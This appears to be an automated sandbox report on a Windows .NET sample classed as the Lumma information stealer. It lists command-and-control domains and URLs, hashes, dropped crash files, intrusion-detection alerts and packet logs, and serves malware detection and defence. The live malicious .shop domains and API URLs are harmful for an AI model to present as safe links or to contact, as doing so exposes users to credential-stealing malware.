    froytnewqowv.shop100%Avira URL Cloudphishing
    https://froytnewqowv.shop/api100%Avira URL Cloudmalware
    locatedblsoqp.shop100%Avira URL Cloudphishing
    stagedchheiqwo.shop100%Avira URL Cloudphishing
    traineiwnqo.shop100%Avira URL Cloudmalware
    NameIPActiveMaliciousAntivirus DetectionReputation
    froytnewqowv.shop
    188.114.97.3
    truetrue
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://froytnewqowv.shop/apitrue
      • Avira URL Cloud: malware
      unknown
      froytnewqowv.shoptrue
      • Avira URL Cloud: phishing
      unknown
      stamppreewntnq.shoptrue
      • Avira URL Cloud: phishing
      unknown
      condedqpwqm.shoptrue
      • Avira URL Cloud: phishing
      unknown
      evoliutwoqm.shoptrue
      • Avira URL Cloud: safe
      unknown
      locatedblsoqp.shoptrue
      • Avira URL Cloud: phishing
      unknown
      caffegclasiqwp.shoptrue
      • Avira URL Cloud: malware
      unknown
      millyscroqwp.shoptrue
      • Avira URL Cloud: malware
      unknown
      stagedchheiqwo.shoptrue
      • Avira URL Cloud: phishing
      unknown
      traineiwnqo.shoptrue
      • Avira URL Cloud: malware
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://froytnewqowv.shop/RegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      http://upx.sf.netAmcache.hve.5.drfalse
      • URL Reputation: safe
      unknown
      https://froytnewqowv.shop/apivRegAsm.exe, 00000002.00000002.1940966413.0000000000A4D000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: phishing
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      188.114.97.3
      froytnewqowv.shopEuropean Union
      13335CLOUDFLARENETUStrue
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1501436
      Start date and time:2024-08-29 22:58:07 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 4m 26s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Number of analysed new started processes analysed:10
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:NewInst.exe
      Detection:MAL
      Classification:mal100.troj.evad.winEXE@5/6@1/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 15
      • Number of non-executed functions: 49
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
      • Excluded IPs from analysis (whitelisted): 20.42.65.92
      • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • VT rate limit hit for: NewInst.exe
      TimeTypeDescription
      16:58:58API Interceptor1x Sleep call for process: RegAsm.exe modified
      16:59:24API Interceptor1x Sleep call for process: WerFault.exe modified
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      188.114.97.3Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • www.coinwab.com/kqqj/
      file.exeGet hashmaliciousLummaCBrowse
      • joxi.net/4Ak49WQH0GE3Nr.mp3
      Document_pdf.exeGet hashmaliciousFormBookBrowse
      • www.x0x9x8x8x7x6.shop/dscg/
      QUOTATION_AUGQTRA071244#U00b7PDF.scrGet hashmaliciousUnknownBrowse
      • filetransfer.io/data-package/zbi9vNYx/download
      z1209627360293827.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • www.coinwab.com/kqqj/
      file.exeGet hashmaliciousLummaCBrowse
      • joxi.net/4Ak49WQH0GE3Nr.mp3
      Rudvfa0Z17.exeGet hashmaliciousNitolBrowse
      • web.ad87h92j.com/4/t.bmp
      nOyswc9ly2.dllGet hashmaliciousUnknownBrowse
      • web.ad87h92j.com/4/t.bmp
      QUOTATION_JULQTRA071244#U00faPDF.scr.exeGet hashmaliciousUnknownBrowse
      • filetransfer.io/data-package/0U9QqTZ6/download
      QUOTATION_AUGQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • filetransfer.io/data-package/e0pM9Trc/download
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      froytnewqowv.shop1YC268KfwD.exeGet hashmaliciousLummaCBrowse
      • 188.114.96.3
      PqyFc2vziL.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.96.3
      file.exeGet hashmaliciousUnknownBrowse
      • 172.64.41.3
      4QihT6CwD8.exeGet hashmaliciousAzorultBrowse
      • 104.21.2.6
      https://5kirp.mellifluous5.com/5kiRp/Get hashmaliciousHTMLPhisherBrowse
      • 172.66.0.227
      https://autode.sk/4g6XSl8&c=E,1,I0OgoTIAL6zcaU4kgbWKwMGE3oDCv6iOL9CcUXdPtaitrRYDaY2yqyg5z3Y_ue3psEsBTb_33PlDmEStP6z69HizNf2ISciGwmDuh9q-ApyQjjb2ectuilD2Rn0,&typo=1Get hashmaliciousUnknownBrowse
      • 104.17.246.203
      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 188.114.96.3
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.96.3
      rPEDIDO.exeGet hashmaliciousAgentTeslaBrowse
      • 104.26.13.205
      file.exeGet hashmaliciousLummaCBrowse
      • 188.114.96.3
      COTIZACION 280824.exeGet hashmaliciousFormBookBrowse
      • 104.21.10.159
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaC, VidarBrowse
      • 188.114.97.3
      file.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      rBslc_Pymt-Hs.exeGet hashmaliciousRemcos, DBatLoaderBrowse
      • 188.114.97.3
      Izvod racuna u prilogu.exeGet hashmaliciousDBatLoader, FormBookBrowse
      • 188.114.97.3
      Z66MsXpleT.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 188.114.97.3
      66cf818156193_ldjfnsfd.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      0VCartoonizer_Trial.exeGet hashmaliciousLummaCBrowse
      • 188.114.97.3
      eSLlhErJ0q.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
      • 188.114.97.3
      No context
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):65536
      Entropy (8bit):1.0833266034729874
      Encrypted:false
      SSDEEP:192:ClBeFy/b++0Nvw4MjezEKJAazuiFFZ24IO8Z:Efb+lNvw5jenAazuiFFY4IO8Z
      MD5:12A50D0ABF0F015D76E6775394DB8DD3
      SHA1:1C1031EAA3FA57BA0D875932B96495F46A6CB3ED
      SHA-256:0E038DB36B41F6E9469097B65D824AE08E7005DDE0FE20DFABD5E9461D10E911
      SHA-512:2AA16F9E121BE4CCC036F8416DE0BC2C8C15A0593D72B76D0D9FECC9B1346564697377977FC6F9AC70062099E565384C9C93FF5FDF1CB6DA93173B92FCB2B826
      Malicious:false
      Reputation:low
      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.4.3.8.7.4.0.3.6.0.4.8.0.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.4.3.8.7.4.0.8.6.0.4.8.5.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.7.7.c.0.c.6.6.-.5.e.8.a.-.4.1.e.9.-.a.4.c.3.-.8.5.b.8.9.f.0.6.6.d.6.a.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.a.4.b.7.7.c.7.-.a.d.d.3.-.4.e.2.a.-.8.f.4.a.-.c.8.b.a.6.3.6.3.4.6.d.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.A.s.m...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.A.s.m...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.d.8.-.0.0.0.1.-.0.0.1.4.-.2.c.d.1.-.6.1.4.4.5.6.f.a.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.3.0.a.b.5.5.5.9.e.8.0.6.5.7.4.d.2.6.b.4.c.2.0.8.4.7.c.3.6.8.e.d.5.5.4.8.3.b.0.!.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
      Category:dropped
      Size (bytes):6298
      Entropy (8bit):3.71955395050752
      Encrypted:false
      SSDEEP:96:RSIU6o7wVetbAeM6oFYwJ1QQwIMK5aM4UqF89bTYSsfCRm:R6l7wVeJDM6IYwJWQJprc89bTfsfCRm
      MD5:B398CB994A5C467C5A8C9FFE9D9A7792
      SHA1:72F193FC0A3215B3E974E6F642F9D28305DC4463
      SHA-256:FB26C97CE809889E7956F83B8E1645314D0BD653F956ED237497880A11D3AA2B
      SHA-512:53624A69299E3E32EEE4BD59408CCC591DF2C7CC185163C77717B829A07E2ED00270ACECC9A0F8F2E4693C8BA4EB14D017FD1C179D345CB5DA4AE3D80554793B
      Malicious:false
      Reputation:low
      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.6.4.0.<./.P.i.
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):4636
      Entropy (8bit):4.445112467314755
      Encrypted:false
      SSDEEP:48:cvIwWl8zs4Jg77aI9cfWpW8VYiYm8M4JfuNnFY+q8oWSQgLuOLuerd:uIjf+I7qO7VmJfuIvpBukuerd
      MD5:802DE9770E79E58620A0C2227EF229FF
      SHA1:0357F321228666B5E0B6BE89184B4D00099DB471
      SHA-256:83F0FE6FD627DA5046ABAB22AA4E4E93F6A652EE27BD07E00A72FADA8C6FC23D
      SHA-512:BB2B445459ED559F1B614578C31FBEADD8AD024057A329F341F624B02BBB320425B2DDB8355B7AEEC88D149584E191074EE16FAC4BBDDDC7CF6DD73C114CDD2E
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="477361" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:Mini DuMP crash report, 15 streams, Thu Aug 29 20:59:00 2024, 0x1205a4 type
      Category:dropped
      Size (bytes):106708
      Entropy (8bit):2.056367481976088
      Encrypted:false
      SSDEEP:384:RitmSzU8hb5Hn3YSPONVYDgYa/hjCT6F21qYq+JKVdiRcy/Ng7OcNpyAy4C:7bS5n3rDG/U621giIoAy1
      MD5:99CF8E60586850745CDF7A471DA87BB5
      SHA1:9B4D81D22415D972C9FA84EB363FB46FD61DF92E
      SHA-256:42173BA54167080EAC225BEB3FC101717F82CEB1864B229C8501BFCD2A01F139
      SHA-512:591E1676AECB8FBDBE9B0153EA6CCFCC130144DDC39EA38506215C251AAA3CA77FF5C1CAE2C0F4188389536C4A4D27D2ED052ABE2261D30E7BEF21474C611DBA
      Malicious:false
      Reputation:low
      Preview:MDMP..a..... ..........f........................H...........<....$...........H..........`.......8...........T...........0D...\...........%...........'..............................................................................eJ.......'......GenuineIntel............T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Users\user\Desktop\NewInst.exe
      File Type:ASCII text, with CRLF line terminators
      Category:dropped
      Size (bytes):42
      Entropy (8bit):4.0050635535766075
      Encrypted:false
      SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
      MD5:84CFDB4B995B1DBF543B26B86C863ADC
      SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
      SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
      SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
      Malicious:true
      Reputation:high, very likely benign file
      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..
      Process:C:\Windows\SysWOW64\WerFault.exe
      File Type:MS Windows registry file, NT/2000 or above
      Category:dropped
      Size (bytes):1835008
      Entropy (8bit):4.4663366639127835
      Encrypted:false
      SSDEEP:6144:FIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNmdwBCswSb+:mXD94zWlLZMM6YFH8++
      MD5:61BFE6FDCA5FF09E0ACA99F2D41E1923
      SHA1:E7BFC1B41E0FFA431993D0ECB6A41043D2C23538
      SHA-256:86792A8C16704A37E4887DFFD9C472D8D32029216FC57CA85BEE843A57A978DD
      SHA-512:CC9A82AE47C59FE4699F99A6ABB00E3F6EF8A27657FB19031BEA8B86603BF359385BF95B5937E6FBB7D84119F372CDF51786210B60DF6ED13A7B9793DE576A06
      Malicious:false
      Reputation:low
      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.v.EV..................................................................................................................................................................................................................................................................................................................................................q........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
      Entropy (8bit):7.9844876919999646
      TrID:
      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      • Win32 Executable (generic) a (10002005/4) 49.78%
      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
      • Generic Win/DOS Executable (2004/3) 0.01%
      • DOS Executable Generic (2002/1) 0.01%
      File name:NewInst.exe
      File size:283'648 bytes
      MD5:c2e7e93d02fa7cba953e3dd4463ba91b
      SHA1:ff908dd3556d49e45b2ef917f441a0035ac5aa97
      SHA256:4e62b2ec1f99fbfaab9b6a9253da40e00d4e5bf9cbecb29e6e77284af424d0d8
      SHA512:5b6032cfb3301e4aea7b5d2ee2b3c2474e9bb8a37a250359cdcc4c122deb7208fb9f5479afbdc3bb562832737f390fe59b434823cfac9afb949b52dbea43c350
      SSDEEP:6144:W9MGS9lvYrQ4ShmWBl4ei3oY6ASC/5LQsmA9sWLnQFWTM/mlZHf2fdp18y:ml+vfTByei3b6A1QhAycTcvj18y
      TLSH:38542323A3A9CCE4F522AA78DC92A1691F1DD375B5490F533C28D1736C1BB3362D7618
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....,.f.................L..........^j... ........@.. ..............................K.....`................................
      Icon Hash:90cececece8e8eb0
      Entrypoint:0x446a5e
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows cui
      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0x66CF2CBA [Wed Aug 28 13:57:14 2024 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
      Instruction
      jmp dword ptr [00402000h]
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x46a080x53.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x480000x242.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4a0000xc.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x468d00x1c.text
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x20000x44a640x44c00b16d235c4e2a6dc5caa62a1c4beddee2False0.9917862215909091data7.992976484719213IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rsrc0x480000x2420x400f0aba3589f3966f42ae31db57f2dbae6False0.302734375data3.5235960918606954IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0x4a0000xc0x200259ae62d1919b28ac9565f5955d0011bFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_MANIFEST0x480580x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
      DLLImport
      mscoree.dll_CorExeMain
      TimestampProtocolSIDSignatureSeveritySource PortDest PortSource IPDest IP
      2024-08-29T22:59:00.462756+0200TCP2049812ET MALWARE Lumma Stealer Related Activity M2149731443192.168.2.4188.114.97.3
      2024-08-29T22:59:00.462756+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149731443192.168.2.4188.114.97.3
      2024-08-29T22:58:58.728283+0200UDP2055478ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop)14954353192.168.2.41.1.1.1
      2024-08-29T22:58:59.391011+0200TCP2049836ET MALWARE Lumma Stealer Related Activity149730443192.168.2.4188.114.97.3
      2024-08-29T22:58:59.391011+0200TCP2054653ET MALWARE Lumma Stealer CnC Host Checkin149730443192.168.2.4188.114.97.3
      2024-08-29T22:58:59.995093+0200TCP2055488ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop)149731443192.168.2.4188.114.97.3
      2024-08-29T22:58:59.226042+0200TCP2055488ET MALWARE Lumma Stealer Domain in TLS SNI (froytnewqowv .shop)149730443192.168.2.4188.114.97.3
      TimestampSource PortDest PortSource IPDest IP
      Aug 29, 2024 22:58:58.744757891 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:58.744792938 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:58.744995117 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:58.748029947 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:58.748047113 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.225883007 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.226042032 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.242820024 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.242836952 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.243735075 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.290585995 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.290626049 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.290827036 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.391083956 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.391211033 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.391264915 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.391275883 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.395483971 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.395541906 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.395549059 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.395673990 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.395720959 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.396652937 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.396666050 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.396680117 CEST49730443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.396686077 CEST44349730188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.485639095 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.485677958 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.485754013 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.486917973 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.486932039 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.994982004 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.995093107 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.996347904 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.996356010 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.996659994 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:58:59.997826099 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.997869968 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:58:59.997890949 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:59:00.462831020 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:59:00.463051081 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:59:00.463121891 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:59:00.463320971 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:59:00.463320971 CEST49731443192.168.2.4188.114.97.3
      Aug 29, 2024 22:59:00.463335991 CEST44349731188.114.97.3192.168.2.4
      Aug 29, 2024 22:59:00.463361979 CEST44349731188.114.97.3192.168.2.4
      TimestampSource PortDest PortSource IPDest IP
      Aug 29, 2024 22:58:58.728282928 CEST4954353192.168.2.41.1.1.1
      Aug 29, 2024 22:58:58.740365028 CEST53495431.1.1.1192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
